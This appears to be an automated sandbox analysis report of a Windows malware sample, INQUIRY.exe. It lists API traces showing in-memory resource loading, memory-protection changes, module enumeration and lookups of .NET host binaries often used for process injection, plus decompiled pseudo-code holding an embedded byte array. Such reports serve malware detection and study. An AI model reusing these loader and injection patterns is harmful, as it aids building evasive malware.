                                                                          • Part of subcall function 00490039: GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                          • Part of subcall function 00490039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                          • Part of subcall function 00490039: SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                          • Part of subcall function 00490039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                          • Part of subcall function 00490039: LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                          • Part of subcall function 0048FED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00490848
                                                                        • VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00490868
                                                                          • Part of subcall function 0048FF82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                        • _memset.LIBCMT ref: 0049089F
                                                                          • Part of subcall function 0048F834: _memset.LIBCMT ref: 0048F869
                                                                        • _memset.LIBCMT ref: 004908F7
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00490919
                                                                        • _memset.LIBCMT ref: 00490945
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0049097B
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0049099D
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000104), ref: 004909DA
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000104), ref: 004909E7
                                                                        • CloseHandle.KERNEL32 ref: 00490A54
                                                                        Strings
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 004909CF
                                                                        • `I, xrefs: 00490825
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 004909E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
                                                                        • String ID: `I$C:\Users\user\Desktop\INQUIRY.exe$C:\Users\user\Desktop\INQUIRY.exe
                                                                        • API String ID: 3419322617-1156463312
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFile_memset
                                                                        • String ID: C:\Users\user\Desktop\INQUIRY.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
                                                                        • API String ID: 3830271748-1189975745
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0048F71D
                                                                        • _memset.LIBCMT ref: 0048F744
                                                                        • RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0048F76D
                                                                        • _memset.LIBCMT ref: 0048F78B
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00496000,000000FF,?,00000104), ref: 0048F7A9
                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0048F829
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
                                                                        • String ID: InstallRoot$Software\Microsoft\.NETFramework
                                                                        • API String ID: 3047945766-4217373442

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExistsFilePath_memset
                                                                        • String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
                                                                        • API String ID: 4214796376-2149642370

                                                                        APIs
                                                                        • _memset.LIBCMT ref: 004901FD
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                        • String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
                                                                        • API String ID: 1620000358-1444991907

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0048FD9D
                                                                          • Part of subcall function 0048904F: __FF_MSGBANNER.LIBCMT ref: 00489072
                                                                          • Part of subcall function 0048904F: __NMSG_WRITE.LIBCMT ref: 00489079
                                                                          • Part of subcall function 0048904F: RtlAllocateHeap.NTDLL(00000000,?), ref: 004890C6
                                                                        • VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 0048FDB4
                                                                        • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048FDC2
                                                                        • _memset.LIBCMT ref: 0048FE03
                                                                        • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048FE14
                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048FE1C
                                                                        • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048FE23
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
                                                                        • String ID:
                                                                        • API String ID: 851286602-0

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                        • FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004900AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
                                                                        • String ID:
                                                                        • API String ID: 3588284000-0

                                                                        APIs
                                                                        • _memset.LIBCMT ref: 004903D2
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        • LoadLibraryExW.KERNEL32(?,?,?), ref: 004903F2
                                                                        • StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00490402
                                                                          • Part of subcall function 004900F0: CloseHandle.KERNEL32 ref: 004900FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
                                                                        • String ID: \system.ni.dll
                                                                        • API String ID: 2189784845-482435895

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                        • EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                        • GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                        • GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
                                                                        • String ID:
                                                                        • API String ID: 3431743260-0

                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                        • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                        • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                        • String ID:
                                                                        • API String ID: 4115577372-0

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0

                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,004891FB), ref: 0048ABDB
                                                                        • __malloc_crt.LIBCMT ref: 0048AC09
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048AC16
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                        • String ID:
                                                                        • API String ID: 237123855-0

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?), ref: 00490366
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00490373
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00490381
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0

                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0048FA13
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Strings
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 0048FA2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                        • String ID: C:\Users\user\Desktop\INQUIRY.exe
                                                                        • API String ID: 1620000358-3835629383

                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,00000004,?), ref: 0048F981
                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0048F9DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 004900E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0

                                                                        APIs
                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0048A141
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0

                                                                        APIs
                                                                        • __encode_pointer.LIBCMT ref: 0048AF49
                                                                          • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEE7
                                                                          • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000005,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEFE
                                                                          • Part of subcall function 0048AED5: RtlEncodePointer.NTDLL(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AF3C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 2585649348-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CloseHandle.KERNEL32 ref: 004900FA
                                                                          • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                          • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                          • Part of subcall function 0048F46C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                          • Part of subcall function 0048F46C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
                                                                        • String ID:
                                                                        • API String ID: 2900862000-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0048DB4E
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0048DB63
                                                                        • UnhandledExceptionFilter.KERNEL32(FI), ref: 0048DB6E
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0048DB8A
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0048DB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID: FI
                                                                        • API String ID: 2579439406-1293059371
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0048A74B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char* _v8;
                                                                        				char _v12;
                                                                        				signed char* _v16;
                                                                        				signed char* _v20;
                                                                        				signed char* _v24;
                                                                        				char _v152;
                                                                        				char _v153;
                                                                        				char _v154;
                                                                        				char _v155;
                                                                        				char _v156;
                                                                        				char _v157;
                                                                        				char _v158;
                                                                        				char _v159;
                                                                        				char _v160;
                                                                        				char _v161;
                                                                        				char _v162;
                                                                        				char _v163;
                                                                        				char _v164;
                                                                        				char _v165;
                                                                        				char _v166;
                                                                        				char _v167;
                                                                        				char _v168;
                                                                        				char _v169;
                                                                        				char _v170;
                                                                        				char _v171;
                                                                        				char _v172;
                                                                        				char _v173;
                                                                        				char _v174;
                                                                        				char _v175;
                                                                        				char _v176;
                                                                        				char _v177;
                                                                        				char _v178;
                                                                        				char _v179;
                                                                        				char _v180;
                                                                        				char _v181;
                                                                        				char _v182;
                                                                        				char _v183;
                                                                        				char _v184;
                                                                        				char _v185;
                                                                        				char _v186;
                                                                        				char _v187;
                                                                        				char _v188;
                                                                        				char _v189;
                                                                        				char _v190;
                                                                        				char _v191;
                                                                        				char _v192;
                                                                        				char _v193;
                                                                        				char _v194;
                                                                        				char _v195;
                                                                        				char _v196;
                                                                        				char _v197;
                                                                        				char _v198;
                                                                        				char _v199;
                                                                        				char _v200;
                                                                        				char _v201;
                                                                        				char _v202;
                                                                        				char _v203;
                                                                        				char _v204;
                                                                        				char _v205;
                                                                        				char _v206;
                                                                        				char _v207;
                                                                        				char _v208;
                                                                        				char _v209;
                                                                        				char _v210;
                                                                        				char _v211;
                                                                        				char _v212;
                                                                        				char _v213;
                                                                        				char _v214;
                                                                        				char _v215;
                                                                        				char _v216;
                                                                        				char _v217;
                                                                        				char _v218;
                                                                        				char _v219;
                                                                        				char _v220;
                                                                        				char _v221;
                                                                        				char _v222;
                                                                        				char _v223;
                                                                        				char _v224;
                                                                        				char _v225;
                                                                        				char _v226;
                                                                        				char _v227;
                                                                        				char _v228;
                                                                        				char _v229;
                                                                        				char _v230;
                                                                        				signed char* _v231;
                                                                        				char _v232;
                                                                        				char _v233;
                                                                        				char _v234;
                                                                        				char _v235;
                                                                        				char _v236;
                                                                        				char _v237;
                                                                        				char _v238;
                                                                        				char _v239;
                                                                        				char _v240;
                                                                        				char _v241;
                                                                        				char _v242;
                                                                        				char _v243;
                                                                        				char _v244;
                                                                        				char _v245;
                                                                        				char _v246;
                                                                        				char _v247;
                                                                        				char _v248;
                                                                        				char _v249;
                                                                        				char _v250;
                                                                        				char _v251;
                                                                        				char _v252;
                                                                        				char _v253;
                                                                        				char _v254;
                                                                        				char _v255;
                                                                        				char _v256;
                                                                        				char _v257;
                                                                        				char _v258;
                                                                        				char _v259;
                                                                        				char _v260;
                                                                        				char _v261;
                                                                        				char _v262;
                                                                        				char _v263;
                                                                        				char _v264;
                                                                        				char _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				char _v270;
                                                                        				char _v271;
                                                                        				char _v272;
                                                                        				char _v273;
                                                                        				char _v274;
                                                                        				char _v275;
                                                                        				char _v276;
                                                                        				char _v277;
                                                                        				char _v278;
                                                                        				char _v279;
                                                                        				char _v280;
                                                                        				signed char* _v284;
                                                                        				char _v288;
                                                                        				intOrPtr _v292;
                                                                        				intOrPtr _v296;
                                                                        				signed int _v300;
                                                                        				char _v320;
                                                                        				void _v348;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* _t178;
                                                                        				void* _t180;
                                                                        				void* _t182;
                                                                        				signed char* _t184;
                                                                        				intOrPtr _t219;
                                                                        				signed int _t231;
                                                                        				intOrPtr _t242;
                                                                        
                                                                        				_t242 = __ecx;
                                                                        				_push(0x44356c);
                                                                        				_v292 = __ecx;
                                                                        				_a4 = _a4 + 4;
                                                                        				_t178 = E0041105D(_a4 + 4);
                                                                        				_push(_t178);
                                                                        				L0044B581();
                                                                        				_t219 = _a8;
                                                                        				if(_t178 == 0) {
                                                                        					E00411069(E0041105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
                                                                        				}
                                                                        				_push(0x44357c);
                                                                        				_t180 = E0041105D(_a4);
                                                                        				_push(_t180);
                                                                        				L0044B581();
                                                                        				if(_t180 == 0) {
                                                                        					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
                                                                        				}
                                                                        				_push(0x443588);
                                                                        				_t182 = E0041105D(_a4);
                                                                        				_push(_t182);
                                                                        				L0044B581();
                                                                        				if(_t182 == 0) {
                                                                        					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
                                                                        				}
                                                                        				_push(0x443598);
                                                                        				_t184 = E0041105D(_a4);
                                                                        				_push(_t184);
                                                                        				L0044B581();
                                                                        				if(_t184 != 0) {
                                                                        					L13:
                                                                        					return _t184;
                                                                        				} else {
                                                                        					_v24 = _t184;
                                                                        					_v16 = _t184;
                                                                        					_v20 = _t184;
                                                                        					_v280 = 0x1d;
                                                                        					_v279 = 0xac;
                                                                        					_v278 = 0xa8;
                                                                        					_v277 = 0xf8;
                                                                        					_v276 = 0xd3;
                                                                        					_v275 = 0xb8;
                                                                        					_v274 = 0x48;
                                                                        					_v273 = 0x3e;
                                                                        					_v272 = 0x48;
                                                                        					_v271 = 0x7d;
                                                                        					_v270 = 0x3e;
                                                                        					_v269 = 0xa;
                                                                        					_v268 = 0x62;
                                                                        					_v267 = 7;
                                                                        					_v266 = 0xdd;
                                                                        					_v265 = 0x26;
                                                                        					_v264 = 0xe6;
                                                                        					_v263 = 0x67;
                                                                        					_v262 = 0x81;
                                                                        					_v261 = 3;
                                                                        					_v260 = 0xe7;
                                                                        					_v259 = 0xb2;
                                                                        					_v258 = 0x13;
                                                                        					_v257 = 0xa5;
                                                                        					_v256 = 0xb0;
                                                                        					_v255 = 0x79;
                                                                        					_v254 = 0xee;
                                                                        					_v253 = 0x4f;
                                                                        					_v252 = 0xf;
                                                                        					_v251 = 0x41;
                                                                        					_v250 = 0x15;
                                                                        					_v249 = 0xed;
                                                                        					_v248 = 0x7b;
                                                                        					_v247 = 0x14;
                                                                        					_v246 = 0x8c;
                                                                        					_v245 = 0xe5;
                                                                        					_v244 = 0x4b;
                                                                        					_v243 = 0x46;
                                                                        					_v242 = 0xd;
                                                                        					_v241 = 0xc1;
                                                                        					_v240 = 0x8e;
                                                                        					_v239 = 0xfe;
                                                                        					_v238 = 0xd6;
                                                                        					_v237 = 0xe7;
                                                                        					_v236 = 0x27;
                                                                        					_v235 = 0x75;
                                                                        					_v234 = 6;
                                                                        					_v233 = 0x8b;
                                                                        					_v232 = 0x49;
                                                                        					_v231 = _t184;
                                                                        					_v230 = 0xdc;
                                                                        					_v229 = 0xf;
                                                                        					_v228 = 0x30;
                                                                        					_v227 = 0xa0;
                                                                        					_v226 = 0x9e;
                                                                        					_v225 = 0xfd;
                                                                        					_v224 = 9;
                                                                        					_v223 = 0x85;
                                                                        					_v222 = 0xf1;
                                                                        					_v221 = 0xc8;
                                                                        					_v220 = 0xaa;
                                                                        					_v219 = 0x75;
                                                                        					_v218 = 0xc1;
                                                                        					_v217 = 8;
                                                                        					_v216 = 5;
                                                                        					_v215 = 0x79;
                                                                        					_v214 = 1;
                                                                        					_v213 = 0xe2;
                                                                        					_v212 = 0x97;
                                                                        					_v211 = 0xd8;
                                                                        					_v210 = 0xaf;
                                                                        					_v209 = 0x80;
                                                                        					_v208 = 0x38;
                                                                        					_v207 = 0x60;
                                                                        					_v206 = 0xb;
                                                                        					_v205 = 0x71;
                                                                        					_v204 = 0xe;
                                                                        					_v203 = 0x68;
                                                                        					_push(0x80);
                                                                        					_push(_t184);
                                                                        					_push( &_v152);
                                                                        					_v202 = 0x53;
                                                                        					_v201 = 0x77;
                                                                        					_v200 = 0x2f;
                                                                        					_v199 = 0xf;
                                                                        					_v198 = 0x61;
                                                                        					_v197 = 0xf6;
                                                                        					_v196 = 0x1d;
                                                                        					_v195 = 0x8e;
                                                                        					_v194 = 0x8f;
                                                                        					_v193 = 0x5c;
                                                                        					_v192 = 0xb2;
                                                                        					_v191 = 0x3d;
                                                                        					_v190 = 0x21;
                                                                        					_v189 = 0x74;
                                                                        					_v188 = 0x40;
                                                                        					_v187 = 0x4b;
                                                                        					_v186 = 0xb5;
                                                                        					_v185 = 6;
                                                                        					_v184 = 0x6e;
                                                                        					_v183 = 0xab;
                                                                        					_v182 = 0x7a;
                                                                        					_v181 = 0xbd;
                                                                        					_v180 = 0x8b;
                                                                        					_v179 = 0xa9;
                                                                        					_v178 = 0x7e;
                                                                        					_v177 = 0x32;
                                                                        					_v176 = 0x8f;
                                                                        					_v175 = 0x6e;
                                                                        					_v174 = 6;
                                                                        					_v173 = 0x24;
                                                                        					_v172 = 0xd9;
                                                                        					_v171 = 0x29;
                                                                        					_v170 = 0xa4;
                                                                        					_v169 = 0xa5;
                                                                        					_v168 = 0xbe;
                                                                        					_v167 = 0x26;
                                                                        					_v166 = 0x23;
                                                                        					_v165 = 0xfd;
                                                                        					_v164 = 0xee;
                                                                        					_v163 = 0xf1;
                                                                        					_v162 = 0x4c;
                                                                        					_v161 = 0xf;
                                                                        					_v160 = 0x74;
                                                                        					_v159 = 0x5e;
                                                                        					_v158 = 0x58;
                                                                        					_v157 = 0xfb;
                                                                        					_v156 = 0x91;
                                                                        					_v155 = 0x74;
                                                                        					_v154 = 0xef;
                                                                        					_v153 = 0x91;
                                                                        					L0044B531();
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_t231 = 7;
                                                                        					_push(0x11);
                                                                        					asm("movsb");
                                                                        					_push( &_v320);
                                                                        					_push( &_v152);
                                                                        					memcpy( &_v348, 0x4435b8, _t231 << 2);
                                                                        					L0044B575();
                                                                        					_v8 =  &_v280;
                                                                        					_v296 =  *((intOrPtr*)(_t219 + 0x18));
                                                                        					_v12 = 0x90;
                                                                        					_v300 =  *(_t219 + 2) & 0x0000ffff;
                                                                        					if(E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
                                                                        						L9:
                                                                        						_t184 = _v284;
                                                                        						if(_t184 != 0) {
                                                                        							E0041118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
                                                                        							_t184 =  *0x4430d8(_v284);
                                                                        						}
                                                                        						L11:
                                                                        						if(_v24 == 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						return  *0x443100(_v24);
                                                                        					}
                                                                        					_push(0x1c);
                                                                        					_push( &_v348);
                                                                        					_push( &_v152);
                                                                        					L0044B575();
                                                                        					_v8 =  &_v280;
                                                                        					_v12 = 0x9b;
                                                                        					_t184 = E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
                                                                        					if(_t184 == 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp Download File
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
